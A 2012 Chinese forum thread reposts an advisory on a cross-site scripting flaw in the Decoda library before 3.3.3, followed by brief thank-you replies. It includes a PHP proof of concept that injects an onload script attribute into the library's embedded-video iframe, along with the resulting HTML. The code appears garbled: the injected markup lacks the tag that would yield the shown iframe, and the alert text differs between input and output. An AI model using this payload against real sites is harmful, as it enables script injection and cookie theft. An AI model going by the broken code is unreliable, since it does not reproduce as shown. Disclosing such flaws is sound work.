90_ 发表于 2012-5-18 12:23:57

Decoda跨站脚本漏洞

Decoda 3.3.3之前版本中存在跨站脚本漏洞,该漏洞源于对用户提供的输入未经正确过滤。

攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书进而发起其他攻击。

目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本

可用以下的概念证明型攻击:<?php
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?>
<?php

$decoda_markup = '"';
$decoda_markup .= 'onload="alert(\'08sec Pentesting XSS\');" id="';

$code->reset($decoda_markup);
echo $code->parse();
?>

This results in the following output (whitespace adjusted):

<iframe src="http://www.youtube.com/embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="560" height="315"
frameborder="0"></iframe>

k红颜 发表于 2012-5-23 23:57:21

Decoda跨站脚本漏洞

raven4310 发表于 2012-5-26 00:37:11

sickles 发表于 2012-5-29 11:52:31

谢谢分享, 学习ing

corpse 发表于 2012-9-15 16:18:47

k红颜 发表于 2012-5-23 23:57
Decoda跨站脚本漏洞

看看学习下。
页: [1]
查看完整版本: Decoda跨站脚本漏洞